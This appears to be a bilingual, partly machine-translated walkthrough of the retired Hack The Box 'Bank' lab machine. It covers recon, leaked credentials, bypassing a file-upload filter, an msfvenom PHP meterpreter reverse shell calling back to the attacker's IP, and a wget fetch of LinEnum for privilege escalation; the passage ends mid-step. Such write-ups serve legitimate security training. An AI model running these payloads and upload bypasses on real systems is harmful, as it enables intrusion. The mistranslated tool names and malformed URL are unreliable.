推箱子2-向右推!_保持冷靜，砍箱子-銀行

推箱子2-向右推!

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.

Hack The Box(HTB)是一個在線平臺，可讓您測試滲透測試技能。它包含一些不斷更新的挑戰。他們中的一些人正在模擬現實世界的場景，而另一些人則更傾向于CTF的挑戰風格。

Note. Only write-ups of retired HTB machines are allowed.

注意。 只允許注銷HTB機器。

Bank is a relatively simple machine, however proper web enumeration is key to finding the necessary data for entry

銀行是一臺相對簡單的機器，但是正確的Web枚舉對于找到必要的輸入數據至關重要

We will use the following tools to pawn the box on a Kali Linux box:

我們將使用以下工具在Kali Linux盒子上放置盒子：

nmap
納帕
gobuster
猛擊者
Searchsploit
Searchsploit
msfconsole
msfconsole
metasploit
元胞
meterperter
計價器
LinEnum
LinEnum

Let's get started.

讓我們開始吧。

第1步-偵察 (Step 1 - Reconnaissance)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

開發機器之前的第一步是進行一些掃描和偵察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

這是最重要的部分之一，因為它將決定您以后可以嘗試利用的內容。在此階段花更多的時間來獲取盡可能多的信息總是更好的選擇。

端口掃描 (Port scanning)

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我將使用Nmap(網絡映射器)。 Nmap是一個免費的開源實用程序，用于網絡發現和安全審核。它使用原始IP數據包來確定網絡上可用的主機，這些主機提供的服務，它們正在運行的操作系統，使用的數據包過濾器/防火墻的類型以及許多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用許多命令來掃描網絡。如果您想了解更多信息，可以在這里查看文檔。

I use the following command to perform an intensive scan:

我使用以下命令執行密集掃描：

nmap -A -v bank.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：啟用操作系統檢測，版本檢測，腳本掃描和跟蹤路由

-v: Increase verbosity level

-v：提高詳細程度

bank.htb: hostname for the Bank box

bank.htb： “銀行”框的主機名

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

如果發現結果有點不堪重負，則可以執行另一個命令以僅獲取打開的端口。

nmap bank.htb

We can see that there are 3 open ports:

我們可以看到有3個開放端口：

Port 22, Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding

端口22 ，安全外殼(SSH)，安全登錄，文件傳輸(scp，sftp)和端口轉發

Port 53, Domain Name System (DNS)

端口53 ，域名系統(DNS)

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

端口 80 ，超文本傳輸??協議(HTTP)最常使用的端口

目錄掃描 (Directory scanning)

I use Gobuster. Gobuster is a directory scanner written in Go. More info on the tool here. Gobuster uses wordlists on Kali which are located in the /usr/share/wordlists directory. I'm using wordlists from dirb and dirbuster, but you can download more wordlists from SecLists here

我用Gobuster。 Gobuster是用Go編寫的目錄掃描程序。在工具更多信息在這里。 Gobuster在/ ali / share / wordlists目錄中的Kali上使用單詞表。我正在使用來自dirb和dirbuster的單詞列表，但是您可以在此處從SecLists下載更多單詞列表

I use this command for the dirb common.txt wordlist

我將此命令用于dirb common.txt單詞表

gobuster dir -u bank.htb -w /usr/share/wordlists/dirb/common.txt

I can see some interesting folders. I do another directory scan with a different wordlist.

我可以看到一些有趣的文件夾。我用另一個單詞表進行另一個目錄掃描。

gobuster dir -u bank.htb -w /usr/share/worldlists/dirbuster/directory-list-lowercase-2.3-medium.txt

第2步-訪問網頁 (Step 2 - Visiting the web page)

From the reconnaissance phase, I decide to start with port 80. It points to an Apache2 Ubuntu Default page. We need to set the hostname. We will follow the standard convention for the HTB machines, bank.htb

在偵察階段，我決定從端口80開始。它指向Apache2 Ubuntu Default頁面。我們需要設置主機名。我們將遵循HTB機器的標準慣例bank.htb

I add bank on the /etc/hosts file

我在/ etc / hosts文件中添加銀行

nano /etc/hosts

with

與

10.10.10.29     bank.htb

I check the file with

我檢查文件

cat /etc/hosts

When I navigate to bank.htb, I can see a login page now

當我導航到bank.htb時，我現在可以看到一個登錄頁面

From the gobuster reconnaissance, I found some folders. I navigate to /balance-transfer

從魔術師的偵察中，我找到了一些文件夾。我導航到/ balance-transfer

I have a look at a couple of files. All the files seems to have the full name, email and password encrypted.

我看幾個文件。所有文件似乎都已加密了全名，電子郵件和密碼。

I go back to the main page and I click on the Size tab to sort the transfers. I can see that one of the file is different

我回到主頁，然后單擊“ 大小”選項卡對傳輸進行排序。我可以看到其中一個文件不同

When I click on the file, I see an error message at the top. The encryption failed for this file. I can see all the details in plain text

當我單擊文件時，在頂部看到錯誤消息。該文件的加密失敗。我可以用純文本形式查看所有詳細信息

I go back to the login panel and enter the credentials. I now have access to the dashboard of the HTB Bank. Nothing interesting on this page, so I move to the Support page

我返回登錄面板并輸入憑據。我現在可以訪問HTB銀行的儀表板。此頁面上沒有任何有趣的內容，因此我轉到“ 支持”頁面

On the Support page, I can upload files. I will try to upload a payload

在支持頁面上，我可以上傳文件。我將嘗試上傳有效載荷

第3步-使用MSFvenom進行漏洞利用 (Step 3 - Using MSFvenom to craft an exploit)

We will use MSFvenom, which is a payload generator . You can learn more about it here

我們將使用MSFvenom，它是有效負載生成器。您可以在此處了解更多信息

But first, let's see on Metasploit Framework which payload we could use to craft our exploit

但是首先，讓我們在Metasploit Framework上看看我們可以使用哪些有效載荷來制作漏洞利用程序

We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.

我們知道我們需要創建一個反向shell ，這是目標計算機與攻擊計算機進行通信的一種shell。攻擊機具有一個偵聽器端口，在偵聽器端口上接收連接，通過使用該連接，可以執行代碼或命令。

The reverse TCP shell should be for PHP and we will use Meterpreter

反向TCP Shell應該用于PHP，我們將使用Meterpreter

From the Offensive Security website, we get this definition for Meterpreter

從“進攻性安全”網站上，我們獲得了Meterpreter的定義

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter是一種高級的，動態可擴展的有效負載，它使用內存中的 DLL注入暫存器，并在運行時通過網絡進行了擴展。它通過暫存器套接字進行通信，并提供全面的客戶端Ruby API。它具有命令歷史記錄，制表符完成，通道等功能。

You can read more about Meterpreter here

您可以在此處閱讀有關Meterpreter的更多信息

I launch Metasploit and search for reverse TCP payloads. I use the following command

我啟動Metasploit并搜索反向TCP有效負載。我使用以下命令

search php meterpreter reverse_tcp

I find an interesting payload, number 594, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective Dll Injection payload and connects back to the attacker

我找到了一個有趣的有效載荷，編號594，它是反向TCP階段程序 。該有效負載通過Reflective Dll Injection有效負載注入抄表器服務器DLL，并連接回攻擊者

payload/php/meterpreter/reverse_tcp

Now let's go back to msfvenom to craft our exploit

現在讓我們回到msfvenom來進行我們的利用

I use the following command

我使用以下命令

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.36 lport=443 -f raw > HTBbankshell.php

I then check with ls if the file has been created

然后我與ls檢查是否已創建文件

and I cat the file to see the exploit with

然后我整理文件以查看漏洞利用

cat HTBbankshell.php

I go back to the support page. I add the title, the message and upload the file on the form

我回到支持頁面。我添加標題，消息并將文件上傳到表單上

I click on the submit button and I see an error message. The file type doesn't seem to work

我單擊提交按鈕，然后看到錯誤消息。文件類型似乎不起作用

I check the source code and I see a comment that indicates that the file extension .htb is needed to execute php for debugging purposes only

我檢查了源代碼，并看到一條注釋，該注釋指示文件擴展名.htb是執行php所需的，僅用于調試目的

I then change the extension of my payload from HTBbankshell.php to HTBbankshell.htb

然后，我將有效負載的擴展名從HTBbankshell.php更改為HTBbankshell.htb

My file is now ready to be uploaded on the support page

我的文件現在可以在支持頁面上載了

And it seems to work! The payload has been uploaded on the support page

它似乎有效！有效負載已上傳到支持頁面上

第4步-使用Metasploit設置偵聽器 (Step 4 - Setting up a listener with Metasploit)

Back on Metasploit where I use the following command to set the payload handler

回到Metasploit，在這里我使用以下命令設置有效負載處理程序

use exploit/multi/handler

I first set up the payload

我首先設置有效載荷

set payload php/meterpreter/reverse_tcp

Then the LHOST

然后LHOST

set lhost 10.10.14.36

And finally the LPORT

最后是LPORT

set lport 4444

If we check the options now, we should see that everything is set up

如果我們現在檢查選項，我們應該看到一切都已設置

Let's run the exploit.

讓我們運行漏洞利用程序。

After this message appears

此消息出現后

Started reverse TCP handler on 10.10.14.36:4444

go back to the browser and refresh the page where the malicious script is hosted

返回瀏覽器并刷新托管惡意腳本的頁面

bank.htb/uploads/HTBbankshell.php

You should then see a Meterpreter session created

然后，您應該看到一個Meterpreter會話已創建

I start by gathering some information with getuid which returns the real user ID of the calling process and sysinfo

我首先使用getuid收集一些信息，該信息返回調用進程和sysinfo的真實用戶ID。

步驟5-尋找user.txt標志 (Step 5 - Looking for the user.txt flag)

I start navigating to root and list the folders/files.

我開始導航到root并列出文件夾/文件。

I move to the home directory with

我將移動到主目錄

cd home

And I can see a user called chris

我可以看到一個叫chris的用戶

I move to the chris directory and when I list the files...

我移到chris目錄，當我列出文件時...

I find the user.txt file! To read the content of the file I use the command

我找到了user.txt文件！要讀取文件的內容，請使用以下命令

cat user.txt

Now that we have the user flag, let's find the root flag!

現在有了用戶標志，讓我們找到根標志！

步驟6-執行特權升級 (Step 6 - Performing Privilege Escalation)

I try to navigate to the root folder and the access is denied

我嘗試導航到根文件夾，但訪問被拒絕

I will use LinEnum to enumerate more information from this machine. LinEnum is used for scripted local Linux enumeration and privilege escalation checks. More info here

我將使用LinEnum枚舉此機器的更多信息。 LinEnum用于腳本化的本地Linux枚舉和特權升級檢查。更多信息在這里

I fetch LinEnum from GitHub with

我從GitHub上獲取LinEnum

wget https://https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

I check with this command if the script has been correctly fetched

我使用此命令檢查腳本是否已正確提取

ls -la

I use the following command

我使用以下命令

chmod 777 LinEnum.sh

to change the file permission and make it readable, writable and executable by everyone

更改文件權限并使其所有人可讀，可寫和可執行

Within meterpreter I check the location of the file with

在meterpreter中，我使用以下命令檢查文件的位置

lls -S "LinEnum.sh"

I start a php server on another terminal with

我在另一個終端上啟動一個php服務器

php -S 10.10.14.36:4444

I type the following command to get a standard shell on the target system

我鍵入以下命令以在目標系統上獲取標準外殼

shell

I spawn a TTY shell with

我生成了一個TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash/")'

And I transfer the file to the machine with

然后我將文件傳輸到機器

wget http://10.10.14.36:4444/LinEnum.sh -O /tmp/LinEnum.sh

where I copy the file from my Kali box to the machine temp folder

我將文件從我的Kali盒復制到機器臨時文件夾的位置

I then navigate to the temp folder to check if the file has been correctly moved

然后，我導航到temp文件夾以檢查文件是否已正確移動

I then run the script with

然后，我使用

sh ./LinEnum.sh

The scan gives me a lot of information. I look for the interesting files section. I check the SUID files section. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it

掃描為我提供了很多信息。我在尋找有趣的文件部分。我檢查了SUID文件部分。 SUID定義為授予用戶臨時權限，使其具有文件所有者(而不是運行它的用戶)的權限來運行程序/文件

I spot an interesting file

我發現了一個有趣的文件